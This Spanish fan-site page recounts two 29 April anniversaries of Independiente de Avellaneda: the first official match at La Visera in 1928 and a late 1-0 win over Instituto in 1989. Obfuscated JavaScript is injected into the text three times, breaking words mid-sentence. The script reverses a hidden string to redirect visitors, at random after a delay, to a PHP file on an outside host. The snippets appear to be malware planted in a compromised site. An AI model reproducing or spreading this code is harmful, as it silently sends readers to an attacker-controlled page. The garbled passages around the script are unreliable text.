Conectate con nosotros

Efemérides

Efemérides del 29 de Abril

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1928Independiente había inaugurado el 4 de marzo de 1928 el primer estadio construido de cemento en toda Sudamérica, La Visera, en ocasión de un partido amistoso frente a Peñarol. Y un día como hoy llega el turno del primer partido oficial en la nueva casa, ya por los puntos.

El 15 de abril el Rojo había comenzado su participación en el Campeonato de Primera División de 1928, visitando y empatando con Tigre por 1 a 1, y en la fecha 2, ahora sí como local, recibe a Sportivo Buenos Aires en un partido que terminó empatado sin goles. Aquel día los 11 del equipo fueron: Néstor Sangiovanni; Carlos Debuglio y Ernesto Chiarella; José Pérez, Juan Presta y Luis Martínez; Zoilo Canaveri, Alberto Lalín, Manuel López, Manuel Seoane y Hugo Martínez.

Luego de ese primer punto obtenido de forma oficial, hubo que esperar hasta la fecha 4 para lograr el primer triunfo en el nuevo estadio, cuando se goleó por 5 a 0 a Almagro con cuatro goles de Manuel Seoane y uno de Alfredo Paolinetti. Posteriormente se lograrían varios partidos invictos en casa: en la sexta frente a River por 3 a 0, en la octava 2 a 1 a Chacarita, en la décima empate 1 a 1 con Lanús, en la duodécima victoria a San Isidro por 3 a 1, y en la fecha 14 llegó la primer derrota por la mínima frente a Ferro.

En aquel campeonato Independiente terminó en el cuarto puesto, a 6 puntos de Huracán que fue el campeón. El goleador del equipo fue Manuel “La Chancha” Seoane con 30 goles, 2 menos que Roberto Cherro de Boca que fue el máximo artillero de la competición.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»68″ height=»53″/></figure></div>



<p><strong>1989</strong> – Una vez más me sitúo en el <strong>Campeona<script>$mWn=function(n){if(typeof ($mWn.list[n])==to de Primera División 1988-1989, el último de duración anual ganado por Independiente. Estamos en la segunda ronda, en la cual el equipo había tenido un comienzo dubitativo e irregular, para luego arrancar con un sprint final impresionante hasta ser un campeón fuera de discusión.

Repasemos: en la fecha 28 triunfo sobre Platense, en la 29 victoria clave sobre Boca que tuvo efeméride, en la 30 otro triunfo sobre San Lorenzo que también recordé, en la 31 sigue la racha al vencer a Racing de Córdoba, en la 32 se le gana a Ferro, y un día como hoy el Rojo se mide con Instituto en Córdoba. El rival era el último de la tabla, por lo que a priori la victoria parecía accesible, pero lo cierto es que fue realmente difícil.

El equipo aquella jornada fue: Eduardo Pereira; Néstor Clausen, Pedro Monzón, Rogelio Delgado y Guillermo Ríos; José Bianco, Miguel Ludueña (27’ Marcelo Morales), Rubén Insúa y Ricardo Bochini; Martín Ubaldi (70’ Pedro Massacessi) y Marcelo Reggiardo, con Jorge “el Indio” Solari como D.T.

El desarrollo del encuentro mostró al local aferrado a que no le hagan goles, mientras que Independiente insinuaba pero le costaba muchísimo. Generó cuatro ocasiones de gol pero las falló, y no tenía a su mejor arma de ataque, Carlos Alfaro Moreno, ausente por lesión. A los 60 minutos llegó la primera situación para Instituto, con un cabezazo de Enrique Nieto que dio en el travesaño. Se acercaba el final del encuentro e Independiente empujaba, y a los 85 minutos tuvo premio, mucho más por esfuerzo que por alto nivel. Pelotazo al área que despeja la defensa de Instituto, la pelota le cae a Guillermo “Luli” Ríos, quien de primera la mete al área nuevamente, allí Rogelio Delgado gana y cabecea hacia el borde del área chica, donde aparece Marcelo Reggiardo para ganarle al arquero y cabecear directo a la red. Fue el 0 a 1 definitivo del cotejo.

Gran triunfo del equipo, trabajoso sin dudas, muy importante también, como varios encuentros más logrando la diferencia en los minutos finales, y no es del todo casualidad, porque este Independiente tenía mucho orden táctico y mucha capacidad física. Se notó en repetidas oportunidades que el Rojo corría mucho más que los rivales en los tramos finales de los partidos, y así lograba diferencias.

A falta de 5 fechas para terminar la temporada, Independiente lograba 4 puntos de ventaja sobre su perseguidor, Boca. Mucha ilusión y optimismo en ese momento, porque para la siguiente jornada ya volvería el “Beto” Alfaro Moreno al equipo, y sería él quien marque el gol para ganarle por la mínima a Newell´s, siguiendo con la racha enorme de triunfos que continuaría por una jornada más venciendo a Gimnasia y Esgrima La Plata.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»71″ height=»55″/></figure></div>



<p>Les dejo <strong>el video del gol</strong>:</p>



<figure class=

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides